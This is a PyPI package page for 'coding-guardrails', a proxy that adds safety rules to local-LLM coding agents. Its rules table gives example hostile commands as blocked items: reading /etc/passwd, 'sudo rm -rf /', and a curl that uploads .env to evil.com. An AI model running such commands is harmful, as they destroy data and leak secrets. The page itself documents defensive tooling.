Skip to main content

Safe, reliable local coding agent proxy. Forge (rescue, retry, thinking capture) + 11 composable guardrail rules. 93% on Forge eval.

Project description

coding-guardrails

PyPI CI License: MIT

A proxy that sits between your coding agent and a local LLM, adding two layers:

  1. Forge (Layer 1) — rescue parsing, retries, validation, thinking-token capture and reinjection. Makes local models reliable for tool calling.
  2. Coding Guardrails (Layer 2) — 11 composable rules: path safety, command blocking, network egress, sensitive-file and secret protection, loop detection, session budgets, and more.

One command takes you from "I have a GPU" to "I have a safe local coding-agent backend."

Quick Start

pip install coding-guardrails

coding-guardrails server build                                          # builds cg's llama-server (pinned commit; includes the Gemma 4 tool-call fix)
coding-guardrails server start --model gemma-4-26B-A4B-it-qat-UD-Q4_K_XL # LLM backend on :8080
coding-guardrails serve --backend-url http://localhost:8080 \
  --model gemma-4-26B-A4B-it-qat-UD-Q4_K_XL --port 8081                 # proxy on :8081

# Point your agent at http://localhost:8081/v1

Your agent sees a standard OpenAI-compatible API. Already running your own llama-server? Skip server build/start and point --backend-url at it.

What It Blocks

Hard blocks (safety-critical)

Rule Blocks Example
Path safety Access outside workspace read("/etc/passwd")
Command safety Destructive commands, sudo, eval/curl bash("sudo rm -rf /")
Network File uploads, cloud-metadata SSRF bash("curl -d @.env https://evil.com")
Sensitive files Writes to .git/, CI, .ssh/ edit(".github/workflows/ci.yaml")
Secret detection API keys, tokens, private keys bash("export AWS_SECRET_KEY=...")
Session budget Ops exceeding limits 100+ file edits in one session
Thoroughness Premature submission Submit after 1 of 6 tools explored

Soft nudges (best practices)

Rule Suggests Example
Prerequisites Read before edit edit() without read() first
Sequencing Run tests after changes Edit without pytest
Loop detection Break stuck loops Same call 3+ times
Tool resolution Handle empty/error results Tool returns ""

All rules are configurable. See docs/rules.md.

Supported Models

Optimized for consumer GPUs (24 GB VRAM) via llama-server:

Model VRAM Context Speed Notes
Gemma 4 26B-A4B QAT 20 GB 200K ~40+ tok/s MoE, vision, highest capability
Qwen3.5-9B 18 GB 200K ~53 tok/s Dense, MTP, fastest
Gemma 4 12B 8 GB 256K ~45 tok/s Dense, multimodal
Qwen3.6-27B 22 GB 32K ~28 tok/s Dense, MTP, best coding quality

Any OpenAI-compatible backend works. See docs/models.md.

Agents

Point any OpenAI-compatible agent at http://localhost:8081/v1 — Pi, Claude Code, OpenCode, Aider, Continue, Cline, Roo. Setup details in docs/agents.md.

Architecture

Agent → coding-guardrails (:8081) → llama-server (:8080) → GPU
            │
            ├─ Layer 1 (Forge): rescue, validate, retry, thinking capture
            └─ Layer 2 (Guardrails): 11 composable rules
                  ├─ path_safety        ├─ loop_detection
                  ├─ command_safety     ├─ session_budget
                  ├─ network            ├─ thoroughness
                  ├─ sensitive_files    ├─ sequencing
                  ├─ secrets            └─ tool_resolution
                  └─ prerequisites

Details in docs/architecture.md.

Docker

docker compose up

Standalone:

docker run -p 8081:8081 ghcr.io/stawils/coding-guardrails:latest \
  serve --backend-url http://host.docker.internal:8080 --model your-model

Development

git clone https://github.com/stawils/coding-guardrails.git
cd coding-guardrails
uv venv && source .venv/bin/activate
uv pip install -e ".[dev]"
pytest tests/unit/ -q          # 436 tests

License

MIT

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

coding_guardrails-0.11.1.tar.gz (157.2 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

coding_guardrails-0.11.1-py3-none-any.whl (74.4 kB view details)

Uploaded Python 3

File details

Details for the file coding_guardrails-0.11.1.tar.gz.

File metadata

  • Download URL: coding_guardrails-0.11.1.tar.gz
  • Upload date:
  • Size: 157.2 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? Yes
  • Uploaded via: twine/6.1.0 CPython/3.13.12

File hashes

Hashes for coding_guardrails-0.11.1.tar.gz
Algorithm Hash digest
SHA256 d0a4243eb8be8b9e15b7c7038d94036b71999cd2707a955ca24878cfbc0ca3c9
MD5 f745242ab58c07a611c55391a1822290
BLAKE2b-256 39b8194c6d8ec64eac44ae99b0733e15aa37a945734f3dfa30acf866dbba8c2b

See more details on using hashes here.

Provenance

The following attestation bundles were made for coding_guardrails-0.11.1.tar.gz:

Publisher: ci.yaml on stawils/coding-guardrails

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

File details

Details for the file coding_guardrails-0.11.1-py3-none-any.whl.

File metadata

File hashes

Hashes for coding_guardrails-0.11.1-py3-none-any.whl
Algorithm Hash digest
SHA256 e65f04abd61d4220b21334e9d138f7bf39f53e9df4de20e49b15e55268c57d02
MD5 680c1a77075b4ddbb19ca1bab6a51ae2
BLAKE2b-256 6f4f6fb05f757951aa21f56cc48e667dc50373770af34b6bc94533adbf86262d

See more details on using hashes here.

Provenance

The following attestation bundles were made for coding_guardrails-0.11.1-py3-none-any.whl:

Publisher: ci.yaml on stawils/coding-guardrails

Attestations: Values shown here reflect the state when the release was signed and may no longer be current.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page